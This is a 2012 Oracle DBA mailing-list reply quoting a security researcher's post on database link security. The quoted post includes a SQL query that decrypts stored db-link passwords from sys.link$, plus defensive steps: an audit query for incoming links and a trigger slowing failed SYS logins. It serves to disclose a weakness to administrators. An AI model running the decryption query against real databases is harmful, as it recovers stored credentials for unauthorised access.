RE: Database Link Security et al

  • From: D'Hooge Freek <Freek.DHooge@xxxxxxxxx>
  • To: "oracle@xxxxxxxxxxxxx" <oracle@xxxxxxxxxxxxx>, "oracle-l@xxxxxxxxxxxxx" <oracle-l@xxxxxxxxxxxxx>
  • Date: Wed, 28 Nov 2012 21:29:34 +0100

Hi,

Where you able to reproduce this on 11.2.0.3?
I checked on two databases and eacht time the dmbs_crypto .decrypt function 
would give me an error.
On 11.2.0.2 it did work however.

Regards,

Freek D'Hooge
Uptime
Oracle Database Administrator
email: freek.dhooge@xxxxxxxxx
tel +32(0)3 451 23 82
http://www.uptime.be
disclaimer: www.uptime.be/disclaimer


-----Original Message-----
From: oracle-l-bounce@xxxxxxxxxxxxx [mailto:oracle-l-bounce@xxxxxxxxxxxxx] On 
Behalf Of oracle@xxxxxxxxxxxxx
Sent: zondag 25 november 2012 21:19
To: oracle-l@xxxxxxxxxxxxx
Subject: Database Link Security et al


So, users can decrypt dblink passwords as the key is included in the 
ciphertext... -->

SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
MYPW

..one saving grace is that we can now identify incoming db links using this..

select userid, terminal, comment$text from sys.aud$ where comment$text like 
'DBLINK%';
USERID         NTIMESTAMP#          USERHOST  COMMENT$TEXT
------------  -----------------     -------   --------------
DBLINK_ACCOUNT  19-NOV-12 01.42.16.305194000    orlin   DBLINK_INFO:
(SOURCE_GLOBAL_NAME=orcl.4294967295)

-->could be too late though so best to take a few precautions in
advance... preferably automated...

..Same with lack of profiles on SYS account. Sometimes easier to fix ourselves..

create or replace trigger sys_throttler.tra_servererror_ora1017
after servererror on database
declare
   l_db_usr varchar2 (32);
begin
   if (ora_is_servererror(1017)) then
      l_db_usr := upper (trim (sys_context ('userenv', 
'authenticated_identity')));
      if l_db_usr ='SYS' then
            dbms_lock.sleep (1);
      else
          NULL;
        end if;
   end if;
end tra_servererror_ora1017;
/

More like this at UKOUG Monday, if you are in the area...

Cheers,
Paul M. Wright
http://www.oraclesecurity.com
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62
--
//www.freelists.org/webpage/oracle-l


--
//www.freelists.org/webpage/oracle-l


Other related posts: